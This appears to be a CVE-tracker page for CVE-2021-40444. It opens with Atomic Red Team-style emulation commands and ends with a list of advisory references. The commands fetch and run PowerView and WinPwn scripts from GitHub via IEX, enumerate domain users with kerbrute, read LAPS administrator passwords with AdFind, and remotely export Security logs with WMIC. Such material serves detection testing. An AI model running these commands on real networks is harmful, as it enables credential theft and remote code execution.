IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainUser -verbose
cd "PathToAtomicsFolder\..\ExternalPayloads"
.\kerbrute.exe userenum -d #{Domain} --dc #{DomainController} "PathToAtomicsFolder\..\ExternalPayloads\username.txt"
Get-ADComputer #{hostname} -Properties *
Get-adcomputer -SearchScope subtree -filter "name -like '*'" -Properties *
Get-ADComputer #{hostname} -Properties ms-Mcs-AdmPwd, ms-Mcs-AdmPwdExpirationTime
& "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" #{optional_args} -h #{domain} -s subtree -f "objectclass=computer" *
& "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" #{optional_args} -h #{domain} -s subtree -f "objectclass=computer" ms-Mcs-AdmPwd, ms-Mcs-AdmPwdExpirationTime
$target = $env:LOGONSERVER
$target = $target.Trim("\\")
$IpAddress = [System.Net.Dns]::GetHostAddresses($target) | select IPAddressToString -ExpandProperty IPAddressToString
wmic.exe /node:$IpAddress process call create 'wevtutil epl Security C:\\ntlmusers.evtx /q:\"Event[System[(EventID=4776)]]"'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
generaldomaininfo -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (6)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2021-40444 |
| portal.msrc.microsoft.com |
GitHub CVE
x_refsource_MISC
|
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-40444 |
| packetstormsecurity.com |
GitHub CVE
x_refsource_MISC
|
http://packetstormsecurity.com/files/164210/Microsoft-Windows-MSHTML-Overview.html |
| packetstormsecurity.com |
GitHub CVE
x_refsource_MISC
|
http://packetstormsecurity.com/files/165214/Microsoft-Office-Word-MSHTML-Remote-Code-Execution.html |
| packetstormsecurity.com |
GitHub CVE
x_refsource_MISC
|
http://packetstormsecurity.com/files/167317/Microsoft-Office-MSDT-Follina-Proof-Of-Concept.html |
| cisa.gov |
NVD API
US Government Resource
|
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2021-40444 |